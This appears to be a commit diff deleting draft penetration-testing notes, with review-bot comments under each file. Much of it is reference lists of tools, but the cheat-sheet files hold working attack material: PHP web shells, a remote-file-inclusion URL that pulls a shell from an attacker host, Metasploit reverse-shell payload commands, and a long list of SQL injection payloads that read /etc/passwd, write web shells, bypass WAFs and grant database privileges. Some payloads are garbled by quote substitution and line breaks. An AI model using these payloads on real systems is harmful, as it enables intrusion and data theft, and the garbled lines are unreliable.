* check articles and guidelines, ignore other sections

+ 0
- 24
Draft/Draft/Draft/Various purpiose based OS' View File

@ -1,24 +0,0 @@
Things I will not sort and only dump here
Kali linux
PenQ is an open source, Linux-based penetration testing browser bundle we built over Mozilla Firefox. It comes pre-configured with security tools for spidering, advanced web searching, fingerprinting, anonymous browsing, web server scanning, fuzzing, report generating and more.
The ArchAssault Project is an Arch Linux derivative for penetration testers, security professionals and all-around Linux enthusiasts. This means we import the vast majority of the official upstream Arch Linux packages, these packages are unmodified from their upstream source. While our Arch Linux base is primarily untouched, there are times were we have to fork a package to be able to better support our vast selection of tools. All of our packages strive to maintain the Arch Linux standards, methods and philosophies.

+ 0
- 36
Draft/Draft/Draft/Web Applications/Add.txt View File

@ -1,36 +0,0 @@
Add content for:
Audit Frontpage/Sharepoint sites
A plugin-based scanner that aids security researchers in identifying issues with several CMSs, mainly Drupal & Silverstripe.
XSS attack examples/ideas
Github dorks - finding vulns
Arachni Web Scanner - XSS challenges
Intro to content Security Policy

+ 0
- 3
Draft/Draft/Draft/Web Applications/Bypassing WAFs.txt View File

@ -1,3 +0,0 @@
Bypassing WAFs

+ 0
- 98
Draft/Draft/Draft/Web Applications/Cheat Sheet.txt View File

@ -1,98 +0,0 @@
Web Application exploitation - a cheatsheet By Tim Arneaud
If you want to get the full article, please go to the Source.
WebShell Backdoors
Minimal php command shells
file cmd.php: PHP script text =>
<?php system($_GET['cmd']) ?>
<?php system($_REQUEST['cmd']); ?>
Example usage via Remote File Include (RFI):
http://<target-ip>/index.php?cmd=<command to execute>&page=http://<attacker-ip>/cmd.php
Null Bytes () may also assist in some cases:
http://<target-ip>/index.php?cmd=<command to execute>&page=http://<attacker-ip>/cmd.php
Encoding windows reverse command shell as asp
msfpayload windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-nc-port> R | msfencode -t asp -o <filename>.asp
Encoding meterpreter in asp
msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-multi-handler-port> R | msfencode -t asp -o <filename>.asp
attacker msfconsole:
use multi/exploit/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <attacker-ip>
set LPORT <attacker-multi-handler-port>
Specific Web applications
Joomla default database configuration filename
Scanning Joomla! for plugins and versions
/pentest/web/scanners/joomscan/ -u <target-and-joomla-path>
/pentest/enumeration/web/cms-explorer -url <target-and-joomla-path> -type joomla
WordPress default database configuration filename
WordPress default login page
<web-app-path> /wp-login.php
WordPress plugins
<web-app-path> /wp-content/plugins
Scanning WordPress for plugins and versions
/pentest/web/wpscan/wpscan.rb --url <target-and-wordpress-path&gt; -enumerate [u|p|v|t]
/pentest/enumeration/web/cms-explorer -url <target-and-wordpress-path> -type wordpress
Newer WP: "Themes" can be uploaded as zip files by WP administrators:
mkdir wpx
vi wpx/cmd.php
cat wpx/cmd.php
<?php system($_GET['cmd']) ?>
zip -r wpx
upload via web interface as an installed theme
Command execution access is via:
Older WP: Webshells can be added by editing exiting files/themes via the web interface or by enabling file upload and permitting the valid file extension (e.g. .php)
Cacti default database configuration filename
<web-app-path> /include/config.php
DeV!L`z ClanPortal
DeV!L`z ClanPortal default database configuration filename
<web-app-path> /inc/mysql.php
Drupal default database configuration filename
<web-app-path> /sites/default/settings.php
Scanning WordPress for plugins and versions
/pentest/enumeration/web/cms-explorer -url <target-and-drupal-path> -type drupal
Timeclock default database configuration filename
SQL Terminators/Comments
<sql injected command>;--
<sql injected command>;#
Login Pages Basic SQL injection
' OR '1=1';--
'OR 1=1--
SQLMap commands
cd /pentest/database/sqlmap
Retrieve SQL Banner, current database and current user; test if the user is the db administrator
./ -u "http://<target>/index.php?param1=1&param2=2&param3=3" -p <injectable-parameter> --banner --current-db --current-user --is-dba
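Review bot: this file is credited to Tim Arneaud and tells the reader to "go to the Source", but no source URL appears anywhere in the hunk, so the attribution cannot be followed; wherever this content lands, add the link. Defects to fix in the relocated copy rather than carry over: the "Null Bytes ()" example is identical to the URL above it because the byte itself was stripped from the text; "use multi/exploit/handler" has the Metasploit module path inverted (the module is exploit/multi/handler); the "Joomla", "WordPress" and "Timeclock default database configuration filename" headings have nothing under them and "Command execution access is via:" has no URL; "<target-and-wordpress-path&gt;" carries an HTML entity in place of ">"; and the "Scanning WordPress for plugins and versions" heading in the Drupal section should say Drupal.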

+ 0
- 67
Draft/Draft/Draft/Web Applications/Cull integrate.txt View File

@ -1,67 +0,0 @@
[Go Buster](
* Directory/file busting tool written in Go
* Recursive, CLI-based, no java runtime
[Relative Path Overwrite Explanation/Writeup](
* RPO (Relative Path Overwrite) is a technique to take advantage of relative URLs by overwriting their target file. To understand the technique we must first look into the differences between relative and absolute URLs. An absolute URL is basically the full URL for a destination address including the protocol and domain name whereas a relative URL doesn’t specify a domain or protocol and uses the existing destination to determine the protocol and domain.
* Probe LAN devices from a web browser.
* Recovers the master password of key3.db files, i.e. Thunderbird, Firefox
[Javascript De-Obfuscation Tools Redux](
* Back in 2011, I took a look at several tools used to deobfuscate Javascript. This time around I will use several popular automated and semi-automated/manual tools to see how they would fare against today’s obfuscated scripts with the least amount of intervention.
Intro to Content Security Policy
Securing Web Application Technologies Checklist
Client Identification Mechanisms
RAWR - Rapid Assessment of Web Resources
COWL: A Confinement System for the Web
robust JavaScript confinement system for modern web browsers. COWL introduces label-based mandatory access control to browsing contexts (pages, iframes, etc.) in a way that is fully backward-compatible with legacy web content.
List of modules in Co2:
Help page:
A collection of enhancements for Portswigger's popuplar Burp Suite web penetration testing tool.
Co2 includes several useful enhancements bundled into a single Java-based Burp Extension. The extension has it's own configuration tab with multiple sub-tabs (for each Co2 module). Modules that interact with other Burp tools can be disabled from within the Co2 configuration tab, so there is no need to disable the entire extension when using just part of the functionality.
OWASP Mantra
“OWASP Mantra is a powerful set of tools to make the attacker's task easier”
Burp Suite extension to generate Intruder payloads using Radamsa
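Review bot: every markdown link in this file is truncated to "[title](" with no URL, so the Go Buster, RPO writeup and JS de-obfuscation references cannot be followed; the two bare bullets "Probe LAN devices from a web browser" and "Recovers the master password of key3.db files" have lost the tool name they describe, and "List of modules in Co2:" and "Help page:" are followed by nothing. Also "popuplar" should read "popular" and "it's own configuration tab" should read "its own".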

+ 0
- 54
Draft/Draft/Draft/Web Applications/Drupal.txt View File

@ -1,54 +0,0 @@
Check changelog file, sometimes they add things in/shows current version
Gain Admin Access Drupal - has to have drush installed
“cd [drupal dir]”
“drush uli”
Copy/Paste URL, change password, bam! Admin.
Watchdog - built in logging
Syslog - Linux sys logging
User Enumeration:
No brute force protection on Version 6
Abuse Password reset feature, tells you valid user creds.
Version 7 has brute force protection
Check Default
Less Noisy:
Check posts authors
Drupal 6 doesn’t use httponly flag
Files to look for:
mysite/sites/default/settings.php - Creds
Check to see:
Masquerade plugin present - allows you to change user to any user.
Devel Plugin present - Shows db info on ever page; allows for php code execution
Drupal Attack Scripts:
Set of brute force scripts and Checklist
Drupal Security Checklist
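Review bot: the "Gain Admin Access" steps ("cd [drupal dir]", "drush uli") presuppose a shell on the host with drush already installed, which the note only half states; say so explicitly so a reader does not take it for a remote technique. "Shows db info on ever page" should read "every page". The file also carries the defensive side (Watchdog and Syslog logging, the Drupal Security Checklist); keep those together with the enumeration notes when the content is moved.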

+ 0
- 22
Draft/Draft/Draft/Web Applications/General Tips Trick.txt View File

@ -1,22 +0,0 @@
Fix up
Generating payload for Tomcat
msfpayload java/shell/reverse_tcp LHOST= W > colesec.war
Tomcat does not have default creds however, when packaged up, it generally has creds similar across distributions.
Use auxiliary/scanner/http/tomcat_mgr_login
Code Injection:
Code Injection is the general term for attack types which consist of injecting code that is then interpreted/executed by the application. This type of attack exploits poor handling of untrusted data. These types of attacks are usually made possible due to a lack of proper input/output data validation, for example:
allowed characters (standard regular expressions classes or custom)
data format
amount of expected data
Code Injection differs from Command Injection in that an attacker is only limited by the functionality of the injected language itself. If an attacker is able to inject PHP code into an application and have it executed, he is only limited by what PHP is capable of. Command injection consists of leveraging existing code to execute commands, usually within the context of a shell.
; ls
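Review bot: "msfpayload java/shell/reverse_tcp LHOST= W > colesec.war" has an empty LHOST value, so the command as written does not produce a usable payload; "Fix up" at the top is a leftover TODO marker. The sentence "Tomcat does not have default creds however, when packaged up, it generally has creds similar across distributions" contradicts itself and should be split into two statements (no credentials out of the box; packaged installs commonly share the same ones). The trailing "; ls" is an unlabeled command-injection example and should be tied to the Command Injection paragraph above it.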

+ 0
- 14
Draft/Draft/Draft/Web Applications/HTML5.txt View File

@ -1,14 +0,0 @@
The Securing HTML5 Assessment Resource Kit, or SH5ARK, is an open source project that provides a repository of HTML5 features, proof-of-concept attack code, and filtering rules. The purpose of this project is to provide a single repository that can be used to collect sample code of vulnerable HTML5 features, actual attack code, and filtering rules to help prevent attacks and abuse of these features. The intent of the project is to bring awareness to the opportunities that HTML5 is providing for attackers, to help identify these attacks, and provide measures for preventing them
Presentation on SH5ARK
GetSH5ARK here:
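Review bot: "Presentation on SH5ARK" and "GetSH5ARK here:" carry no URLs, so the hunk removes a project description with no way to find the project; restore the links (and the missing space in "Get SH5ARK") if the note is kept elsewhere.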

+ 0
- 40
Draft/Draft/Draft/Web Applications/Joomla.txt View File

@ -1,40 +0,0 @@
Joomscan - hasn’t been updated since 2012, still nice.
Application Level Logging
Flat file logging - Jlog
Files to look for:
mysite/configuration.php - Config file
User Enumeration:
Abuse Password reset feature, tells you valid user creds.
Can be brute forced through scripting, but slow
Less Noisy:
Check posts authors
Check user #s
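Review bot: "Joomscan - hasn't been updated since 2012" is a dated claim with no source or link; "Application Level Logging" and "Flat file logging - Jlog" read as headings with nothing under them; and "Check user #s" is too terse to act on and should spell out what is being checked.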

+ 0
- 30
Draft/Draft/Draft/Web Applications/LFI RFI Local File Inclusion.txt View File

@ -1,30 +0,0 @@
LFI Local File Inclusion Techniques (paper)
This paper exposes the ability from the attacker standpoint to use /proc in order to exploit LFI (Local File Inclusion) vulnerabilities. While using /proc for such aim is well known this one is a specific technique that was not been previously published as far as we know. A tool to automatically exploit LFI using the shown approach is released accordingly.
Update: a third (known) technique has been dissected here:
Liffy (tool)
Liffy is a Local File Inclusion Exploitation tool.
Current features include:
data:// for code execution
expect:// for code execution
input:// for code execution
filter:// for arbitrary file reads
/proc/self/environ for code execution in CGI mode
Apache access.log poisoning
Linux auth.log SSH poisoning
Direct payload delivery with no stager
Support for absolute and relative paths
Support for cookies
! I have had issues with access log poisoning on current versions of Apache. This not an issue with the payload delivery and or poisoning. This is more of an issue with the request after the poisoning to kick off your shell. This may require a browser refresh. !
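Review bot: the LFI paper, "Update: a third (known) technique has been dissected here:" and the "Liffy (tool)" entry all have no links, so none of the references survive the move; the filename says "LFI RFI" but the content covers only LFI. The closing "! ... !" paragraph is the tool author's own caveat about access log poisoning and belongs with the Liffy description rather than being dropped.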

+ 0
- 0
Draft/Draft/Draft/Web Applications/Meta.rtf View File

+ 0
- 43
Draft/Draft/Draft/Web Applications/NO SQL Injection.txt View File

@ -1,43 +0,0 @@
NO/SQL Injection
SQL Injection Cheat Sheet
SQL Injection Knowledge Base
Taken from:
“Laudanum is a collection of injectable files, designed to be used in a pentest when SQL injection flaws are found and are in multiple languages for different environments.They provide functionality such as shell, DNS query, LDAP retrieval and others.”
Pen Testing MongoDB
SQLi Lab lessons
SQLI-LABS is a platform to learn SQLI Following labs are covered for GET and POST scenarios:
Error Based Injections (Union Select)
Error Based Injections (Double Injection Based)
BLIND Injections: 1.Boolian Based 2.Time Based
Update Query Injection.
Insert Query Injections.
Header Injections. 1.Referer based. 2.UserAgent based. 3.Cookie based.
Second Order Injections
Bypassing WAF
Bypassing Blacklist filters Stripping comments Stripping OR & AND Stripping SPACES and COMMENTS Stripping UNION & SELECT
Impidence mismatch
Bypass addslashes()
Bypassing mysql_real_escape_string. (under special conditions)
Stacked SQL injections.
Secondary channel extraction
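Review bot: "Taken from:" has no source, so the Laudanum quotation is unattributed, and "SQL Injection Cheat Sheet", "SQL Injection Knowledge Base" and "Pen Testing MongoDB" are bare titles with no links. Typos: "Boolian" should read "Boolean" and "Impidence mismatch" should read "Impedance mismatch"; the run-on "Bypassing Blacklist filters Stripping comments Stripping OR & AND Stripping SPACES and COMMENTS Stripping UNION & SELECT" is a list that lost its line breaks.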

+ 0
- 1
Draft/Draft/Draft/Web Applications/SQLMap Cheat Sheet.txt View File

@ -1 +0,0 @@

+ 0
- 39
Draft/Draft/Draft/Web Applications/Securing Web Applications.txt View File

@ -1,39 +0,0 @@
Securing Web Applications
Center for Internet Security Apache Server 2.4 Hardening Guide:
Magical Code Injection Rainbow Framework
The Magical Code Injection Rainbow! MCIR is a framework for building configurable vulnerability testbeds. MCIR is also a collection of configurable vulnerability testbeds.
Has testing lessons for xss/csrf/sql
Source Code Analysis
RIPS is a tool written in PHP to find vulnerabilities in PHP applications using static code analysis. By tokenizing and parsing all source code files RIPS is able to transform PHP source code into a program model and to detect sensitive sinks (potentially vulnerable functions) that can be tainted by user input (influenced by a malicious user) during the program flow. Besides the structured output of found vulnerabilities RIPS also offers an integrated code audit framework for further manual analysis.
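Review bot: this file carries the defensive references for the tree (the CIS Apache 2.4 hardening guide, the MCIR testbeds, RIPS static analysis) and the CIS guide line has no URL; make sure the relocated copy keeps the link, since otherwise the hardening reference is lost with this deletion.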

+ 0
- 28
Draft/Draft/Draft/Web Applications/Tools/Brute Force Tools.txt View File

@ -1,28 +0,0 @@
Brute Force Tools
Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), bruteforce GET and POST parameters for checking different kind of injections (SQL, XSS, LDAP,etc), bruteforce Forms parameters (User/Password), Fuzzing,etc.
It's very flexible, here are some functionalities:
Multiple Injection points capability with multiple dictionaries
Recursion (When doing directory bruteforce)
Post, headers and authentication data brute forcing
Output to HTML
Colored output
Hide results by return code, word numbers, line numbers, regex.
Cookies fuzzing
Multi threading
Proxy support
SOCK support
Time delays between requests
Authentication support (NTLM, Basic)
All parameters bruteforcing (POST and GET)
Multiple encoders per payload
Payload combinations with iterators
Baseline request (to filter results against)
Brute force HTTP methods
Multiple proxy support (each request through a different proxy)
HEAD scan (faster for resource discovery)
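Review bot: "SOCK support" should read "SOCKS support"; the rest of the hunk is a pasted feature list with no link to the project, so if it is kept, a link would serve the reader better than the list.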

+ 0
- 6
Draft/Draft/Draft/Web Applications/Tools/JS PHP Decoders Unobfuscators.txt View File

@ -1,6 +0,0 @@ php decoder
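Review bot: the hunk header claims six removed lines ("-1,6") but only "php decoder" is rendered as trailing header text and no removed lines appear, so the deleted content cannot be reviewed from this view; check the raw diff before merging.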

+ 0
- 13
Draft/Draft/Draft/Web Applications/Tools/Meta.txt View File

@ -1,13 +0,0 @@
OWASP Mantra
“OWASP Mantra is a powerful set of tools to make the attacker's task easier”
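Review bot: the OWASP Mantra entry here duplicates the one in "Cull integrate.txt" word for word; when the content is consolidated, keep a single copy.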

+ 0
- 0
Draft/Draft/Draft/Web Applications/Tools/SQL Injection.rtf View File

+ 0
- 21
Draft/Draft/Draft/Web Applications/Tools/Scanners.txt View File

@ -1,21 +0,0 @@
Joomla! is probably the most widely-used CMS out there due to its flexibility, user-friendlinesss, extensibility to name a few.So, watching its vulnerabilities and adding such vulnerabilities as KB to Joomla scanner takes ongoing activity.It will help web developers and web masters to help identify possible security weaknesses on their deployed Joomla! sites. No web security scanner is dedicated only one CMS.
CMS Explorer is designed to reveal the the specific modules, plugins, components and themes that various CMS driven web sites are running.
Additionally, CMS Explorer can be used to aid in security testing. While it performs no direct security checks, the "explore" option can be used to reveal hidden/library files which are not typically accessed by web clients but are nonetheless accessible. This is done by retrieving the module's current source tree and then requesting those file names from the target system. These requests can be sent through a distinct proxy to help "bootstrap" security testing tools like Burp, Paros, Webinspect, etc.
CMS Explorer can also search OSVDB for vulnerabilities with the installed components.
CMS Explorer currently supports module/theme discovery with the following products:
And exploration of the following products:
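Review bot: "CMS Explorer currently supports module/theme discovery with the following products:" and "And exploration of the following products:" are followed by nothing, so the product lists were already lost before this deletion; "the the specific modules" has a doubled word, and "No web security scanner is dedicated only one CMS" is missing "to".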

+ 0
- 0
Draft/Draft/Draft/Web Applications/Tools/Tools.rtf View File

+ 0
- 22
Draft/Draft/Draft/Web Applications/Tools/WebShells.txt View File

@ -1,22 +0,0 @@
B374k Shell
File manager (view, edit, rename, delete, upload, download, archiver, etc)
Search file, file content, folder (also using regex)
Command execution
Script execution (php, perl, python, ruby, java, node.js, c)
Give you shell via bind/reverse shell connect
Simple packet crafter
Connect to DBMS (mysql, mssql, oracle, sqlite, postgresql, and many more using ODBC or PDO)
SQL Explorer
Process list/Task manager
Send mail with attachment (you can attach local file on server)
String conversion
All of that only in 1 file, no installation needed
Support PHP > 4.3.3 and PHP 5
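Review bot: this is a feature list for a PHP webshell with no link and no statement of why it is listed; if it is kept, say where it is from and what the list is for. "Give you shell via bind/reverse shell connect" should read "Gives you a shell".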

+ 0
- 0
Draft/Draft/Draft/Web Applications/Web Applications.rtf View File

+ 0
- 32
Draft/Draft/Draft/Web Applications/Wordpress.txt View File

@ -1,32 +0,0 @@
WPScan - Awesomesauce. Updated.
App level loggging
WP Security Audit log - Plugin
Files to look for:
mysite/wp-config.php - Creds infile
User Enumeration:
Abuse Password reset feature, tells you valid user creds.
Can be brute forced
Less Noisy:
Check posts authors
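Review bot: "App level loggging" should read "logging" and "Creds infile" should read "Creds in file"; "WPScan - Awesomesauce. Updated." gives neither a link nor a version.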

+ 0
- 111
Draft/Draft/Draft/Web Applications/sqli cheat.txt View File

@ -1,111 +0,0 @@
CheatSheet: SQL Injection
/* – Multi line comment.
# – single line comment.
-- – single line comment.
/*!*/ – Mysql special comments.
+, %2B, %20, %09, %0d ,%0?, /**/, /*foo*/
Global system variables
@@datadir // Mysql data directory.
@@version_compile_os - //OS Mysql is running on.
@@version – //Mysql database version.
user() – //Current database user.
@@log_error – //Path to error log.
database() – //Current database.
The INFORMATION_SCHEMA database is made up of the following objects:
Columns in a SELECT.
file.php?var=1 order by 10-- //Unknown column ’10' in ‘order clause’
file.php?var=1 and(select * from table)=(1)-- //Operand should contain 9 column(s)
Encoding. //For matching collations.
file.php?var=1 union select cast(version() as latin1)-- //5.0.11
file.php?var=1 union select convert(version() as binary)-- //5.0.11
file.php?var=1 union select aes_decrypt(aes_encrypt(version(),1),1)-- //5.0.11
file.php?var=1 union select unhex(hex(versions()))-- //5.0.11
file.php?var=1 union select user()-- //Checking current user. root@localhost
file.php?var=1 union select file_priv from mysql.user where user=’root’-- //Checking for the file priveledge on current user, Y =Yes N=No.
file.php?var=1 union select load_file(‘/etc/passwd’)-- // Loading system files.
file.php?var=1 and+(select+1+from+(select+count(0),concat((select+load_file(‘/etc/passwd’),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)-- // Loading system files with error based injection.
file.php?var=1 union select “<?php system($_GET[c]);?>” into outfile ‘/dir/dir/shell.php’-- // Write code to a file.
file.php?var=1 limit 1 into outfile ‘/dir/dir/shell.php’ lines terminated by “<?php system($_GET[c]);?>”--+ //Write to a file.
WAF & security bypasses.
file.php?var=1 /*!union*/ /*select*/ version()-- //MySQL comments.
file.php?var=1 unUNIONion seleSELECTct version()-- //Filter bypass
file.php?var=1/**/union/**/select/**/version()-- //Whitespace bypass
file.php?var=1 UnION SElecT version()-- //Mixed upper/lower
file.php?var=1 uni/**/on sel/**/ect version()-- //php comments.
file.php?var=1 uni%6Fn select version()-- //URL encoding.
file.php?var=1 %252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users-- //Taking advantage of a WAF that only decodes input once.
file.php?var=1 0×414141414141414141414141414141414141 union select version()-- //Buffer overflow.
file.php?var=1 union select 0x3a3a3a-- //Encode to bypass magic quotes.
Extracting data from MySQL errors.
file.php?var=1 and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--
file.php?var=1 or (select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select version() from information_schema.tables limit 1),1,64),floor(rand(0)*2)))--
file.php?var=1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand(0)*2)) x from (select 1 union select 2)a group by x limit 1) --
file.php?var=1 or (select count(*) from table group by concat(version(),floor(rand(0)*2)))--
file.php?var=1 union select password from users where id=1 and row(1,1)>(select count(*),concat( (select users.password) ,0x3a,floor(rand()*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) --
Name_const(Mysql 5.0.12 > 5.0.64)
file.php?var=1 or(1,2)=(select * from(select name_const(version(),1),name_const(version(),1))a)--
Extractvalue & updatexml (MySQL 5.1+)
file.php?var=1 and extractvalue(rand(),concat(0x3a,version()))-- //Xpath error
file.php?var=1 and updatexml(rand(),concat(0x3a,version()))-- //Xpath error
file.php?var=(@:=1)or@ group by concat(@@version,@:=!@)having@||min(0)-- //Credits BlackFan.
file.php?var=(@:=9)or@ group by left(@@version,@:=~@)having@||min(0)-- //Credits Blackfan.
file.php?var=1 UNION SELECT * FROM (SELECT version() FROM information_schema.tables JOIN information_schema.tables b)a--
Injecting into an order byfile.php?var=(select if(substring(version(),1,1)=4,1,(select 1 union select 2)))--
file.php?var=1,ExtractValue(1,concat(0x5c,(sele ct table_name from information_schema.tables limit 1)))--
file.php?var=1 and IF(ASCII(SUBSTRING((SELECT version()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW())))-- //time based BSQLi
file.php?var=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3))-- //Time based BSQLi
file.php?var=1 AND (SELECT @a:=MID(BIN(FIND_IN_SET(MID(table_name,1,1), ‘a,b,c,d,e,f
$,%,^,&,*,(,),-,+,=,\,,.,”,\’,~,`,\\,|,{,},[,],:,;, ,’)),1,1) FROM in
formation_schema.tables LIMIT 1)=@a AND IF(@a!=”,@a,SLEEP(5))--
If Statement SQL Injection Attack Samples
SELECT IF(user()='root@localhost','true','false')
Load File
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
Create User
CREATE USER username IDENTIFIED BY 'password'; --
Drop User
DROP USER username; --
Make user to DBA
GRANT ALL PRIVILEGES ON *.* TO username@'%';
List Users
SELECT * FROM mysql.user WHERE 1 LIMIT 1,1
SELECT * FROM mysql.user
Getting user defined tables SELECT table_name FROM information_schema.tables WHERE table_schema = 'tblUsers'
Getting Column NamesSELECT table_name, column_name FROM information_schema.columns WHERE table_schema = 'tblUsers’tblUsers -> tablename
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';
find table which have a column called 'username'
String without Quotes
This will return ‘KLM’.
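Review bot: several payload lines are corrupted by word-processor quote substitution and line wrapping and will not work as typed: the curly quotes in the file_priv, load_file, into outfile and lines terminated by lines (’ ‘ “ ” in place of ASCII quotes), the "0×4141..." line where a multiplication sign replaces the x of the hex literal, "sele ct" with a space, "versions()" for "version()", and the FIND_IN_SET query split across three lines with "in / formation_schema" broken mid-word. "Injecting into an order by" and "Getting Column Names" have their headings fused onto the query that follows. Logic problem in the information_schema queries: the annotation "tblUsers -> tablename" says tblUsers is a table, yet both queries filter on table_schema, which is the database name; a table filter belongs on table_name. Finally, "String without Quotes / This will return 'KLM'." has lost the expression it describes.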

+ 0
- 165
Draft/Draft/Draft/Wireless View File

@ -1,165 +0,0 @@
Wireless Networks
Bluetooth NSA toolset talk/attacks vid
[WPA/WPA2 Dictionaries](
* This is the tool created to automate Evil Twin attack and capturing public and guest credentials of Access Point
[SS7: Locate. Track. Manipulate. You have a tracking device in your pocket](
* Companies are now selling the ability to track your phone number whereever you go. With a precision of up to 50 meters, detailed movement profiles can be compiled by somebody from the other side of the world without you ever knowing about it. But that is just the tip of the iceberg.
Fox Hunting & Wardriving
[Practical Foxhunting 101](
Wireless Reconnaissance
Description: iSniff GPS passively sniffs for SSID probes, ARPs and MDNS (Bonjour) packets broadcast by nearby iPhones, iPads and other wireless devices. The aim is to collect data which can be used to identify each device and determine previous geographical locations, based solely on information each device discloses about previously joined WiFi networks.
iOS devices transmit ARPs which sometimes contain MAC addresses (BSSIDs) of previously joined WiFi networks, as described in [1]. iSniff GPS captures these ARPs and submits MAC addresses to Apple's WiFi location service (masquerading as an iOS device) to obtain GPS coordinates for a given BSSID. If only SSID probes have been captured for a particular device, iSniff GPS can query network names on and visualise possible locations.
Guide to setting up/doing wifi attacks
this article, we proved the capabilities of an inexpensive wireless adapter and a flexible virtualized wireless attack image by breaking into a WEP protected test network. For just $16
Piece to purchase:
RFID - Radio Frequency Identification
Hardware and software to run a RFID reader to harvest card information. This is the PCB design and Arduino code that will run a RFID reader, allowing you to gather and harvest cards. Typically, a larger reader, such as those in garages, will be more successful, allowing you to ready over a couple feet instead of inches. The board itself is designed to be modular and support multiple methods to output harvested cards once they are read:
Text file on a MicroSD card
Print out to LCD
Bluetooth Low Energy Arduino serial connection
Each of these options are supported in code, but can be ignored on the PCB. The PCB itself has been designed to use a pluggable module for each of these options, making it easy to ignore, install, or change out which ones you find useful.
Zigbee Wireless Networks